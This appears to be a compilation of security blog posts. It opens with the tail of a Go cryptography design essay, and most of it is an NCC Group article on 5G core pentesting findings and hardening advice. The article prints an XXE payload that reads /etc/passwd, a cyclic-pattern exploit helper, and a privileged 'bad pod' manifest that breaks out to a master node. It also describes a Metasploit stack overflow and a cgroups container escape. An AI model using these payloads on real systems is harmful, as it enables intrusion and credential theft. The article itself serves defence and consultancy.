Safe APIs: APIs should be hard to misuse and should hide all details that are not needed. For instance, when dealing with elliptic curves, points and scalars and signatures should be just arrays of bytes; it is not useful for applications to see modular integers and finite field elements and point coordinates. Sometimes it is, when building new primitives with more complex properties; but for 95% of applications (at least), using a low-level mathematics-heavy API is just more ways to get things wrong.
Code generation: for some tasks, the computer is better at writing code than the human. Main example here is implementation of finite fields, in particular integers modulo a big prime; much sorrow has ensued from ill-controlled propagation of carries. The fiat-crypto project automatically generates proven correct (and efficient) code for that and Go uses said code.
Low complexity: things should be simple. The more functions an API offers, the higher the probability that an application calls the wrong one. Old APIs and primitives, that should normally no longer be used in practice, are deprecated; not fully removed, because backward compatibility with existing source code is an important feature, but still duly marked as improper to use unless a very good reason to do so is offered. Who needs to use plain DSA signatures or the XTEA block cipher nowadays? Some people do! But most are better off not trying.
Readability: everything should be easy to read. Complex operations should be broken down into simpler components. Readability is what makes it possible to do all of the above. If code is unreadable, it might be correct, but you cannot know it (and usually it means that it is not correct in some specific ways, and you won’t know it, but some attacker might).
An important point here is that performance is not a paramount goal. In “secure, safe, practical, modern”, the word “fast” does not appear. Cryptographic implementations have to be somewhat efficient, because “practical” implies it (if an implementation is too slow, to the point that it is unusable, then it is not practical), but the quest for saving a few extra clock cycles is pointless for most applications. It does not matter whether you can do 10,000 or 20,000 Ed25519 signatures per second on your Web server! Even if that server is very busy, you’ll need at most a couple dozen per second. Extreme optimization of code is an intellectually interesting challenge, and in some very specialized applications it might even matter (especially in small embedded systems with severe operational constraints), but in most applications that you could conceivably develop in Go and run on large computers, safety and practicality are the important features, not speed of an isolated cryptographic primitive.
– Thomas Pornin
Real World Cryptography 2024
NCC Group’s Cryptography Services team boasts a strong Canadian contingent, so we were excited to learn that RWC 2024 will take place in Toronto, Canada on March 25–27, 2024. We look forward to catching up with everyone next year!
To ensure the security of new 5G telecom networks, NCC Group has been providing guidance, conducting code reviews, performing red team engagements and pentesting 5G standalone and non-standalone networks since 2019. As with any network, different attackers have different motivations. An attacker might aim to gain information about subscribers on an operator's network by targeting signalling, access customers' private data such as billing records, take control of the management network, or take down the network entirely. In most cases, the main avenue of attack is via the management layer into the core network, either through the operator's support personnel or via a third-party vendor. In all cases, attacking a 5G network will take a number of weeks or months, with the main group of attackers being Advanced Persistent Threat (APT) groups. Many governments around the world, including the UK government, are legislating and demanding that operators and vendors reduce telecoms security gaps to ensure a resilient 5G network.
However, many operators are unclear on the typical threats, how they could affect their business, or whether they affect it at all. Many companies are understandably investing significant time and effort into testing and reviewing threats to make sure they adhere to compliance requirements.
Here, we aim to cover some of the main issues we have discovered during our pentesting and consultancy engagements with clients and explain not only what they are but how likely the threat is to disrupt the 5G network.
Background
Any typical 5G network deployment, be it a Non-Standalone (NSA) or Standalone (SA) core, has various security threats and risks associated with it. These threats can be exploited through either known vulnerabilities (e.g. default credentials) or unknown ones (e.g. zero-days). The main focus of any attack is the existing core management network, whether via a malicious insider or an attacker who has leveraged access to a suitably high-level administrator account or default credentials. We have seen this first hand in red team engagements against various operators. Secondary attack vectors are insecure remote sites hosting RAN infrastructure, which in turn allow access to the core network via the management network. Various mechanisms (e.g. firewalls, IDS) are put in place to manage these risks, but vulnerable networks and systems have to be tested thoroughly to limit attacks. A good understanding of the 5G network topology and its associated risks and threats is key, and NCC Group has the necessary experience and knowledge to scope and deliver this testing.
Typical perceived threats, and their severity if compromised, are illustrated below. The high-risk vector is via the corporate and vendor estate, the medium-risk vectors are via the external internet and rogue operators, and the low-risk vector is via the RAN edge nodes. This factors in ease of access plus the degree of severity should an attacker leverage access. For example, if an attacker were to gain access to the corporate network, along with suitable credentials for the cloud network equipment running the 5G network, a DoS attack would have a high-level impact. Contrast this with an attacker leveraging access to a RAN edge node to conduct a DoS attack, where the exposure would be limited to the cell site in question.
“Attack scenarios against a typical 4G/5G mobile network”
So, a bit of background on 5G. A 5G NSA network consists of a 5G OpenRAN deployment or a gNodeB utilising a 4G LTE core, while a 5G Standalone (SA) network consists of a 5G RAN (Radio Access Network) plus a 5G core only. Within an NSA deployment, a secondary 5G carrier is provided in addition to the primary 4G carrier. A 5G NSA user equipment (UE) device connects first to the 4G carrier before also connecting to the secondary 5G carrier. The 4G anchor carrier is used for control plane signalling while the 5G carrier is used for high-speed data plane traffic. This approach has been used for the majority of commercial 5G network deployments to date, as it provides improved data rates while leveraging existing 4G infrastructure. The main benefits of 5G NSA are that an operator can build out a 5G network on top of their existing 4G infrastructure instead of investing in a new, costly 5G core; that the NSA network uses 4G infrastructure which operators are already familiar with; and that deployment can be quicker by using the existing infrastructure. A 5G SA network helps reduce latency, improves network performance and centralises control of network management functions. 5G SA can deliver new essential 5G services such as network slicing, allowing multiple tenants or networks to exist separately from each other on the same physical infrastructure. While services like smart meters require security, low power and high reliability but are forgiving with respect to latency, others like driverless cars may need ultra-reliable low-latency communication (URLLC) and high data speeds. Network slicing in 5G supports these diverse services and facilitates the efficient reassignment of resources from one virtual network slice to another. The main disadvantage of implementing a 5G SA network, however, is the cost of implementation and of training staff to learn and correctly configure all parts of the new 5G SA core infrastructure.
An OpenRAN network allows deployment of a Radio Access Network (RAN) with vendor-neutral hardware or software, using open interface specifications between the components (e.g. RU/DU/CU) and supporting different architecture options. A Radio Unit (RU) handles the radio link and antenna connectivity, while a Distributed Unit (DU) handles the baseband protocols and the interconnection to the Centralised Unit (CU). The architecture options include a RAN with just Radio Units (RU) and Baseband Units (BBU), or one split between RU, DU and CU. Normally the Radio Unit is a physical amplifier device connected over a fibre or coaxial link to a DU component that is normally virtualised. A CU component is normally located back in a secure datacentre or exchange and provides the eNodeB/gNodeB connectivity into the core. In most engagements we have seen the use of Kubernetes running DU/CU pods as Docker containers, primarily on Dell hardware, with a software-defined network layer linking into the 5G core.
In 5G, a user identity (i.e. the IMSI) is never sent over the air in the clear. On the RAN/edge datacentre, the control and user planes are encrypted over the air and on the wire (e.g. with IPsec), with the 5G core utilising encrypted and authenticated signalling traffic. The 5G network components expose externally and internally facing HTTP/2 Service Based Interface (SBI) APIs, which provide access directly to the 5G core components for management, logging and monitoring. Usually the SBI interface is secured using TLS client and server certificates. The network can now support different tenants by implementing network slices, with the Software Defined Networking (SDN) layer isolating network domains for different users.
So what are the main security threats?
Shown below is a high-level overview of a 5G network with a summary of threats. A radio unit front end containing the gNodeB (i.e. the basestation) handles interconnects to the user equipment (UE); an RU, DU and CU together form the gNodeB. The Distributed Unit (DU) handles the baseband layer, connecting to the RU over the fronthaul and to the Centralised Unit (CU) over the midhaul. The DU does not have any access to customer communications, as it may be deployed in unsupervised sites. The CU and the Non-3GPP Inter Working Function (N3IWF), which terminates the Access Stratum (AS) security, will be deployed in sites with more restricted access. The DU and CU components can be collocated or separate, usually running as virtualised components within a cluster on standard servers. To support low-latency applications, Multi-Access Edge Computing (MEC) servers are now being developed to reduce network congestion and application latency by pushing computing resources, including storage, to the edge of the network, collocating them with the front RF equipment. The MEC offers application developers and content providers cloud computing capabilities and an IT service environment at the edge of the external data network, providing processing capacity for high-demand streaming applications like virtual reality games as well as low-latency processing for driverless cars. All components are connected over Nx links. The main threats against the DU/CU/MEC components are physical attacks against the infrastructure, either to cause damage (e.g. arson) or to compromise the operating system to glean information about users on the RAN signalling plane. In some cases, attacking the core via these components by compromising management platforms is also possible. Targeting the MEC via a poorly configured CI/CD pipeline and the ingest of malicious code could also be a threat.
The N1/N2 link carrying the NAS protocol provides mobility management and session management between the user equipment (UE) and the Access and Mobility Management Function (AMF); it is carried over the RRC protocol to and from the UE. A User Plane Function (UPF) acts as a router for user data connections. The core network consists of the AMF, a gateway to the core network, which talks to the AUSF/UDM to authenticate the handset with the network, while the network also authenticates itself to the handset using a public key. In the core network all components, including a lot of legacy 4G components, are now virtualised, running as Kubernetes pods, with worker nodes running on either a custom cloud environment or an open-source instance like OpenStack. Targeting the 5G NFVI or mobile core cloud via corporate access is a likely attack vector, either to disrupt the service with a DoS attack or to acquire billing data. Similar signalling attacks as in 4G are now prevalent in 5G, due to the same 4G components and associated protocols (e.g. SS7, DIAMETER, GTP) being collocated with 5G components, utilising the legacy 4G network to provide service for the 5G network. Within 5G, HTTP/2 SBI interfaces are now in use between the core components (e.g. AMF, UPF); however, due to missing or poor encryption it is still possible to either view this traffic or query the APIs directly. The diagram below illustrates the various threats against a typical 5G deployment; a fuller, more comprehensive hierarchy of threats is detailed within the MITRE FiGHT attack framework.
“Threats against a typical 5G network”
Reducing the vulnerabilities will decrease the risks and threats an operator faces. However, there is always a trade-off between testing time and vulnerability coverage, and we can never guarantee that we have found every issue in a component. When scoping pentesting assessments, we always start at the edge and work our way into the centre of the network, trying to peel away the layers of functionality to expose potential security gaps. The same testing methodology applies to any network, but detailed below are some of the key points that we cover when brought in to consult on 5G network builds.
Segment, restrict and deny all
Simple idea – if an attacker cannot see the service or endpoint, then they cannot leverage access to it. A segmented network can improve network performance by containing specific traffic only to the parts of the network that need to see it. It can help to reduce attack surface by limiting lateral movement and preventing an attack from spreading; for example, segmentation ensures malware in one section does not affect systems in another. Segmentation also reduces the number of in-scope systems, thereby limiting costs associated with regulatory compliance. However, we still see poor segmentation during engagements, where it was possible to connect directly to management components from the corporate operator network. Implementing VLANs to segment a 5G network is down to the security team and network architects. When considering a network architecture, segmenting the management network from signalling and user data traffic is key. Limiting access to the 5G core, NFVI services and exposed management interfaces to a small set of IP ranges, using robust firewall rules with an implicit "deny all" statement, is required. The Operations Support System (OSS) and Business Support Systems (BSS) are instrumental in managing the network but, if not properly segmented from the corporate network, can allow an unauthenticated attacker to leverage access to the entire 5G core network. Implementing robust role-based access controls and multi-factor authentication for these applications is key, with suitably hardened Privileged Access Workstations (PAW) in place and access closely monitored. Do not implement a secure 5G core but then allow all third-party vendors access to the entire network. Limit access using the principle of least privilege – should vendor A have access by default to vendor B's management system? The answer is a clear no.
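The default-deny principle can be made concrete at each zone boundary with a host or gateway packet filter. The following nftables sketch illustrates the idea; the subnet, ports and log prefix are hypothetical examples, not a recommended production ruleset:

```nft
# Illustrative nftables policy for a 5G core management zone.
table inet mgmt_filter {
  chain input {
    type filter hook input priority 0; policy drop;   # implicit "deny all"
    ct state established,related accept
    iif "lo" accept
    # Management access only from a hardened PAW subnet (example range)
    ip saddr 10.10.50.0/28 tcp dport { 22, 443 } accept
    # Everything else, including the corporate LAN, is logged and dropped
    log prefix "mgmt-drop " drop
  }
}
```

The key property is the `policy drop` default: anything not explicitly allowed, such as traffic from the wider corporate estate or a third-party vendor enclave, never reaches the management plane.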
Limit access to the underlying network switches and routers, and be sure to review the configuration and firmware versions of the devices. During recent 5G pentesting we have discovered poor default passwords for privileged accounts still in use, allowing access to network components, as well as end-of-support switch and router firmware. If an attacker were able to leverage access to the underlying network components, any virtualised cloud network could simply be cut off from the rest of the enterprise network. Within the new 5G network, software-defined networking (SDN) is used to provide greater network automation and programmability through the use of a centralised controller. However, the SDN controller provides a single point of failure and must have robust security policies in place to protect it. Check the configuration of the SDN controller software. Perhaps it is a Java application with known vulnerabilities. Or is there an unauthenticated northbound REST API exposed to everyone in the enterprise network? Has the SDN controller OS been left unhardened, with, say, no account lockout policy and default or weak SSH credentials?
In short, follow zero-trust principles when designing 5G network infrastructure.
Secure the exposed management edge
An attacker will likely gain access to the corporate network first before pivoting laterally into the enterprise network via a jumpbox. So secure any services supplying access to the 5G core, whether at the NFVI application layer (such as the hardware running the cloud instance), the exposed OSS/BSS web applications, or any interconnects (e.g. N1/N2 NAS) back to the core. Limit access to the exposed web applications with strong Role Based Access Controls (RBAC) and monitor access. Use a centralised access management platform (e.g. CyberArk) to control and police access to the OSS/BSS platforms. If you have to expose the cloud hardware management layer to users (e.g. Dell iDRAC/HP iLO), don't use default credentials, and limit the recovery of remote password hashes. Exposing these underlying hardware control layers to multiple users due to poor segmentation could let an attacker conduct a DoS attack by simply turning off servers within the cluster and locking administrators out of the platforms used to manage services.
The myriad exposed web APIs used for monitoring or control are also a vector for attack. During a recent engagement we discovered an XML External Entity injection (XXE) vulnerability within an exposed management API, which made it possible for an authenticated, low-privileged attacker to abuse the configuration of the XML processor to read any file on the host system.
It was possible to send crafted payloads to the endpoint OSS application located at https://10.1.2.3/oss/conf/ and trigger this vulnerability, which would allow an attacker to:
• Read the filesystem (including listing directories), which ultimately yielded a valid user account on the server running the API, along with the credentials to successfully log into that machine's SSH service.
• Trigger Server-Side Request Forgery (SSRF).
The resulting authenticated XXE request and response is illustrated below:
Using this XXE vulnerability, it was possible to read a properties file, recover LDAP credential information, and then SSH directly into the host running the API server. In this particular case, once on the host running the containerised web application, the user could read all of the encrypted password hashes stored on the host, utilising the same decryption process and poorly stored key values that were used to encrypt them. The same password was used for the root account, allowing trivial privilege escalation to root. With root access to the running API server, which in turn was a Docker container running as a Kubernetes pod, it was possible to leverage a weakness in the Kubernetes configuration to escape the container and escalate privileges to the underlying cluster worker node host. To prevent this type of escalation, a defence-in-depth approach is paramount on any Linux host and on any containers. More on this below.
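For readers unfamiliar with the technique, a classic XXE payload against an endpoint of this kind has the following general shape. This is an illustrative sketch, not the exact payload used on the engagement; the target file is a placeholder, and the mitigation check is one simple defensive option rather than a complete fix:

```python
# Sketch of a classic XXE payload: the external entity causes a
# vulnerable XML processor to read a local file and reflect its
# contents back in the response.
TARGET_FILE = "/etc/passwd"  # placeholder; the engagement targeted a properties file

xxe_payload = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE config [
  <!ENTITY xxe SYSTEM "file://{TARGET_FILE}">
]>
<config>
  <item>&xxe;</item>
</config>"""

def reject_dtd(document: str) -> None:
    """Crude server-side mitigation sketch: refuse any document that
    carries a DTD or entity declaration before it reaches the parser."""
    if "<!DOCTYPE" in document or "<!ENTITY" in document:
        raise ValueError("DTDs and entity declarations are not allowed")
```

The robust fix is to disable DTD processing and external entity resolution in the XML parser itself; rejecting documents that declare entities, as above, is a useful belt-and-braces check in front of it.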
Implement exploit mitigation measures on binaries
If you expose a service externally, be sure to check that it is compiled with exploit mitigation measures. Exploitation can be significantly simplified by the manner in which a service or binary has been built. If a binary has an executable stack, and lacks modern exploit mitigations such as ASLR, NX, stack cookies and hardened C functions, then an attacker can utilise any issue they might find, such as a stack buffer overflow, to get remote code execution (RCE) on the host. This was discovered whilst testing a 5G instance that exposed a sensitive, encrypted, proprietary service. The service was exposed externally to the enterprise network, and a brief analysis showed that it was likely a high-risk process because:
• It was exposed on all network interfaces, making it reachable across the network
• It ran as the root user
• It was built with an executable stack, and no exploit mitigations
• It used unsafe functions such as memcpy, strcat, system, popen, etc.
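Two of these properties, PIE (a prerequisite for full ASLR) and a non-executable stack, can be checked directly from a binary's ELF headers. The following is a minimal sketch for 64-bit little-endian ELF images, not a replacement for a dedicated tool such as checksec:

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header describing the stack's permissions
PF_X = 0x1                 # execute flag
ET_DYN = 3                 # position-independent executables are ET_DYN

def check_mitigations(elf: bytes) -> dict:
    """Report two basic hardening properties of a 64-bit little-endian
    ELF image: PIE, and a non-executable stack (PT_GNU_STACK present
    and lacking PF_X)."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    e_type, = struct.unpack_from("<H", elf, 16)
    e_phoff, = struct.unpack_from("<Q", elf, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
    # A missing PT_GNU_STACK segment historically meant an executable stack.
    nx_stack = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx_stack = not (p_flags & PF_X)
    return {"pie": e_type == ET_DYN, "nx_stack": nx_stack}
```

On a real binary this would be driven by `check_mitigations(open(path, "rb").read())`; a full assessment would also cover RELRO, stack canaries and fortified functions.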
The service took a simple encrypted stream of data that was easily decryptable into a configuration message. Analysis of the message showed an issue with how the buffer data was stored, making it possible to trigger memory corruption via a stack buffer overflow. After decompiling the binary using Ghidra, it was clear that one important value was not passed as an input to the function processing a certain string of data making up the configuration message: the size of the buffer used to store the parts of the string. Many of the instances where the function was used were safe due to the size and location of the target buffers. However, one of the elements of the message string was split into 12 parts, the first of which was stored in a short buffer (20 bytes in length) located at the end of the stack frame. Due to the part's length it was possible to overwrite data adjacent to the buffer, and due to the buffer's location, that data was the saved instruction pointer. When the function returned, the saved instruction pointer was used to determine where to continue execution; as the attacker could control this value, they could take control of the process's execution flow.
Knowing how to corrupt the stack, it was possible to use Metasploit to determine the offset of the instruction pointer and how much data could be written to the stack. As the stack was executable, it was straightforward to find a gadget that would perform a 'JMP ESP' instruction. An initial 100-byte payload was generated using Metasploit (pattern_create.rb); this was used to find the offset at which to overwrite the instruction pointer, using the Metasploit pattern_offset.rb script. The shellcode, also generated by Metasploit, simply created a remote listener on port 5600 and was written to the stack after the bytes that control the instruction pointer.
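The cyclic-pattern trick behind pattern_create.rb and pattern_offset.rb is simple enough to sketch. This is an illustrative Python equivalent of the technique, not the Metasploit implementation itself:

```python
import itertools
import string

def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). Each aligned
    uppercase/lowercase/digit triple is unique, so a value pulled from
    a crashed register maps back to a single offset in the input."""
    out = bytearray()
    for upper, lower, digit in itertools.product(string.ascii_uppercase,
                                                 string.ascii_lowercase,
                                                 string.digits):
        out += f"{upper}{lower}{digit}".encode()
        if len(out) >= length:
            break
    return bytes(out[:length])

def pattern_offset(value: bytes, length: int = 8192) -> int:
    """Offset of `value` (e.g. the bytes that landed in the saved
    instruction pointer after a crash) within the pattern, or -1."""
    return pattern_create(length).find(value)
```

Sending `pattern_create(100)` as the payload and then looking up the bytes found in the saved instruction pointer with `pattern_offset` gives the exact distance from the start of the buffer to the return address.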
Finding and generating suitable exploit code took around 5-10 days' work and would require an attacker with good reverse engineering skills. The service was running as root on the 5G virtualised network component and, due to that component's access within the 5G network, could have been leveraged by an attacker to compromise all other components. During this review the AFL fuzzer was used to look for any other locations within the input stream that could cause a crash; a number of crashes were found, revealing multiple further issues with the binary.
“Running AFL fuzzer against the target binary”
To illustrate this issue further, please read our blog post Exploit the Fuzz – Exploiting Vulnerabilities in 5G Core Networks. In that particular open-source case, exposing "external" protocols and associated services, like the UPF component, on a remotely hosted server not directly within the 5G core could be leveraged by an attacker to compromise a server (e.g. the SMF) within the 5G core. It is important to bear this in mind when deploying equipment out to the edge of the network. Physical access to a component is possible even within a roadside cabinet or a semi-secure location such as an exchange, allowing an attacker to leverage access to the 5G core via a less closely monitored signalling or data plane service. This is more prevalent now with the deployment of OpenRAN components, where multiple services (RU, DU, CU) are potentially exposed.
Secure the virtualised cloud layer
All 5G cores run on a virtualised cloud system, be it a custom-built environment or one from a provider such as VMware. The main question is: can an attacker break out of one container or pod to compromise other containers, or potentially other clusters? It might even be possible for an attacker to exploit the underlying hypervisor infrastructure if suitably positioned. There are multiple capabilities that can be assigned to a running pod or container – privileged mode, hostPID, the sysadmin capability (CAP_SYS_ADMIN), docker.sock, hostPath, hostNetwork – that could be overly permissive, allowing an attacker to leverage a feature to mount the underlying host cluster file system or take full control over the Kubernetes host. We have also seen issues with kernel patching, with a kernel privilege escalation vulnerability leveraged to break out of a container.
During recent testing, security controls on the deployment of pods in the cluster were not enforced by an admission controller. This meant that privileged containers, containers with the node file system mounted, containers running as root, and containers with host facilities could all be deployed. This would enable any cluster user or principal with pod deployment privileges to compromise the cluster, the workloads and the nodes, and potentially gain access to the wider 5G environment.
The risk to an operator is that any developer with deployment privileges, even to a single namespace, can compromise the underlying node and then access all containers running on that node – which may belong to other namespaces they do not have direct privileges for – breaking the role-separation model in use.
Exploiting a vulnerability such as the XXE issue above, or brute-forcing SSH login credentials, to reach a Docker container running with overly permissive capabilities is a path we have taken on various engagements, and is illustrated below.
“Container breakout via initial XXE vulnerability”
As mentioned, it was possible to recover SSH credentials via an XXE vulnerability. Utilising the SSH access and escalating to root permissions on the container, it was possible to abuse a known issue with cgroups to perform privilege escalation and compromise the nodes and cluster from an unprivileged container. The Linux kernel does not check that the process setting the cgroups release_agent file has the correct administrative privileges (the CAP_SYS_ADMIN capability in the root namespace), so an unprivileged container that can create a new namespace with a fake CAP_SYS_ADMIN capability through unshare could force the kernel to execute arbitrary commands when a process completed.
It was possible to enter a namespace with CAP_SYS_ADMIN privileges and use the notify_on_release feature of cgroups, which did not differentiate between root-namespace and user-namespace CAP_SYS_ADMIN, to execute a shell script with root privileges on the underlying host. A syscall breakout was used to execute a reverse shell payload with cluster admin privileges on the underlying cluster host. This is shown below:
“Container breakout utilising cgroups”
Once a shell was created on the underlying Kubernetes cluster host, it was then possible to SSH directly to the RAN cluster, due to credentials seen in backup files, and attack the basestation equipment. It was also possible to leverage the weak security controls on the deployment of pods in the cluster, since there was no admission controller. As the compromised cluster user had pod deployment privileges, it was possible to deploy a manifest specifying a master node for the pod to be deployed to; the access gained was root privileges on a master node. This highly privileged access enabled compromise of the whole cluster, through gaining cluster administrator privileges from a kubeconfig file located on the node filesystem.
As a proof-of-concept attack, the following deployment specification can be used to target the master node by chroot'ing to the underlying host:
“Deploying a bad pod to gain access to master node”
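A "bad pod" manifest of this kind typically looks like the following. This is an illustrative sketch: the pod, node and image names are hypothetical, and depending on the cluster a toleration for the control-plane taint may also be required:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed        # hypothetical name
spec:
  nodeName: master-node-1         # pin the pod to a (hypothetical) master node
  hostPID: true
  hostNetwork: true
  containers:
  - name: shell
    image: ubuntu:22.04
    securityContext:
      privileged: true
    # chroot into the mounted node filesystem; from here the kubeconfig
    # on the master node is readable
    command: ["chroot", "/host", "sleep", "infinity"]
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /                     # mount the entire node filesystem
```

With `kubectl exec` into this pod, an attacker is effectively root on the master node, which is exactly what a properly configured admission controller should prevent.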
With the kubeconfig file from the master node it is then possible to read all namespaces on the cluster. It would also be possible from the master node to access the underlying hypervisor or virtualisation platform. In some cases, due to discovered credentials, we have also been able to log directly into the vSphere client and disable hosts.
Strict enforcement of privilege limitations is essential to ensuring that users, containers and services cannot bridge the containerisation layers of container, namespace, cluster, node and hosting service. It should be noted that if only a small number of principals have access to a cluster, and they all require cluster administration privileges, then a cluster admin could likely modify any admission controller policies anyway. However, best practice is to implement business policies and enforce the blocking of containers with weak security controls. Equally, if more roles are added to the administration model at a later date, the value of implementing admission controllers increases. In short, the main recommendation is to ensure appropriate privilege security controls are enforced to prevent deployments having access to, or the ability to compromise, other layers of the orchestration model. Consider implementing limitations on which worker nodes containers can be deployed to, and on whether insecure manifest configurations can be deployed.
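As one concrete option, Kubernetes' built-in Pod Security Admission can enforce such a baseline per namespace with nothing more than labels. The sketch below is illustrative (the namespace name is hypothetical); third-party admission controllers such as Kyverno or Gatekeeper allow finer-grained policy:

```yaml
apiVersion: v1
kind: Namespace
metadata:
  name: ran-workloads             # hypothetical namespace
  labels:
    # Reject privileged containers, hostPath/hostPID/hostNetwork, and
    # containers running as root, at admission time.
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    # Surface violations in existing workloads without blocking them.
    pod-security.kubernetes.io/warn: restricted
```

With the `restricted` profile enforced, the "bad pod" style of deployment described above is rejected at admission rather than relying on detection after the fact.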
Scan, verify, monitor and patch all images regularly
When deploying virtualised container images, it is important to check regularly for any changes to the underlying OS, audit events such as logins, and patch all critical vulnerabilities as soon as possible. Basic vulnerability management is key: identifying and preventing risks to all hosts, images and functions. Scanning images before they are deployed should be done by default and at a regular interval.
For instance, if a Kubernetes cluster is utilising a Harbor registry, simply enabling vulnerability scanning ("Automatically scan images on push") with a suitable tool such as Trivy, backed by a regularly updated vulnerability database, will suffice. It is even possible to prevent images with vulnerabilities above a certain severity from running. Implementing signed images, or content trust, also gives you the ability to verify both the integrity and the publisher of all data received from a registry over any channel.
“Setting harbor to automatically scan images”
Enforce, through tighter contracts with vendors, the need to supply patches to images more quickly, and verify as far as possible that patches have not changed the underlying functionality. Enforcing the use of hardened Linux OS images is best practice, utilising CIS benchmark scans to verify OS images have been hardened. This is also important on the underlying cluster hosts. Our recommendation is to move security back to the developer or vendor with a secure Continuous Integration and Continuous Delivery (CI/CD) pipeline, with Open Policy Agent integrations to secure workloads across the Software Development Life Cycle (SDLC). NCC Group conducts regular reviews of CI/CD pipelines and can help you understand the issues. Please check out 10 real world stories of how we've compromised CI/CD pipelines for further details.
If possible, get a software bill of materials (SBOM) from vendors. An SBOM is an industry best-practice part of secure software development that enhances understanding of the upstream software supply chain, so that vulnerability notifications and updates can be properly and safely handled across the installed customer base. The SBOM documents proprietary and third-party software, including commercial and free and open-source software (FOSS), used in software products. The SBOM should be maintained and used by the software supplier, and stored and viewed by the network operator. Operators should periodically check it against known vulnerability databases to identify potential risk. However, the level of risk for a vulnerability should be determined by the software vendor and operator with consideration of the software product, use case and network environment.
Once an image is running, verifying the running services with some form of runtime defence is key. This entails implementing strong auditing, utilising auditd and syslog to monitor kernel, process and access logs. We have seen engagements with no auditing in place and no use of any antivirus. Securing containers with Seccomp and either AppArmor or SELinux would go a long way towards preventing container escapes. Feeding all of the logging data into a suitable active defence engine could allow for more predictive and threat-based active protection for running containers. Predictive protection could include capabilities like determining when a container runs a process not included in the origin image or creates an unexpected network socket. Threat-based protection includes capabilities like detecting when malware is added to a container or when a container connects to a botnet. Utilising a machine learning model for each running container in the cluster is highly recommended. Applied intelligence used for monitoring log data is key for any threat prevention, helping the SOC quickly identify key 5G attack vectors.
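As one example of such hardening, a runtime seccomp profile can deny the syscalls used in the cgroups breakout described earlier. The fragment below is a deliberately small, illustrative deny-list; production profiles are better built as allowlists, such as the Docker/containerd default profile:

```json
{
  "defaultAction": "SCMP_ACT_ALLOW",
  "syscalls": [
    {
      "names": ["unshare", "mount", "umount2", "keyctl", "ptrace", "setns"],
      "action": "SCMP_ACT_ERRNO"
    }
  ]
}
```

In Docker such a profile is applied per container with `--security-opt seccomp=profile.json`; blocking `unshare` and `mount` alone would have frustrated the fake-CAP_SYS_ADMIN namespace and release_agent steps of the breakout described above.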
Implement 5G security functions
Previous generations of cellular networks failed to provide confidentiality and integrity protection on some pre-authentication signalling messages, allowing attackers to exploit multiple vulnerabilities such as IMSI sniffing or downgrade attacks. The 5G standard facilitates a base level of security with various security features; however, we have seen during engagements that these are not always enabled.
The 5G network uses data encryption and integrity protection mechanisms to safeguard data transmitted by the enterprise, prevent information leakage and enhance data security. Not implementing these will compromise confidentiality, integrity and availability (CIA).
5G introduces novel protection mechanisms specifically designed for signalling and user data. 5G security controls outlined in 3GPP Release 15 include:
• Subscription permanent identifier (SUPI) – a unique identifier for the subscriber
• Dual authentication and key agreement (AKA)
• Anchor key is used to identify and authenticate the UE; the key is used to create secure access throughout the 5G infrastructure
• X.509 certificates and PKI are used to protect various non-UE devices
• Encryption keys are used to demonstrate the integrity of signalling data
• Authentication when moving from 3GPP to non-3GPP networks
• Security anchor function (SEAF) allows reauthentication of the UE when it moves between different network access points
• The home network carries out the original authentication based on the home profile (home control)
• Encryption keys will be based on IP network protocols and IPsec
• Security edge protection proxy (SEPP) protects the home network edge
• 5G separates control and data plane traffic
Besides increasing the length of the key algorithms (256-bit keys are expected in future 3GPP releases), 5G makes support for user plane integrity protection mandatory, and extends confidentiality and integrity protection to the initial NAS messages. The table below summarises the confidentiality and integrity protection requirements defined in the 3GPP specifications. 5G also secures the UE network capabilities, a field within the initial NAS message used by UEs to report the integrity and encryption algorithms they support to the AMF.
In general there has been an increase in the number of security features in 5G to address issues found with the legacy 2G, 3G and 4G network deployments and various published exploits. These have been included within the different 3GPP specifications and adopted by the various vendors. It should be noted that a lot of the security features are optional and the implementation of these is down to the operator rather than the vendor.
The only security features defined as mandatory within the 5G standards are integrity protection of the RRC/NAS signalling plane and, on the IPX interface, the use of a Security Edge Protection Proxy (SEPP). SUPI encryption is optional, but in the UK it is effectively required due to GDPR.
“Table illustrating various 4G / 5G security functions”
As shown, user plane integrity protection is still optional to use, so the user plane in theory remains vulnerable to attacks such as malicious redirection of traffic using a spoofed DNS response. Some providers now turn on the new user plane integrity protection feature by default and prevent an attacker forcing the network to use a less secure algorithm. In 4G, a series of GRX firewalls is in place to limit attacks via the IPX network, but due to the use of HTTPS in 5G control messages, a new SEPP device is mandated to allow matching of control and user plane sessions.
By collecting 5G signalling traffic, it is possible to check implementations and analyse their vulnerabilities. NCC Group conducts these assessments and advises clients on implementing the various optional security features, whether related to 5G or to legacy systems, such as enabling the A5/4 algorithm on GSM networks. This issue is illustrated clearly in the paper European 5G Security in the Wild: Reality versus Expectations, which highlights the lack of concealment of permanent identifiers and the fact that it was possible to capture the permanent IMSI and IMEI values, which are sent without protection within the NAS Identity Response message. Issues with the temporary identifier and GUTI refresh have also been observed: after the NAS Attach Accept and RRC Connection Request messages, the m-TMSI value was not refreshed, changing only during a Registration procedure. This would allow TMSI tracking and possible geolocation of 5G user handsets.
As 5G networks become more mature and deployments progress to full 5G SA deployments, it is likely issues affecting the network will be addressed. However, it is important to implement and test these new security features as soon as possible to prevent a compromise.
Summary
The 5G network is a complex environment, requiring methodical comprehensive reviews to secure the entire stack. Often a company may lack the time, specialist security knowledge, and people needed to secure their network. Fundamentally, a 5G network must be configured properly, robustly tested and security features enabled.
As seen from above, most compromises have the following root causes or can be traced back to:
• Lack of segmentation and segregation
• Default configurations
• Overly permissive permissions and roles
• Poor patching
• Lack of security controls
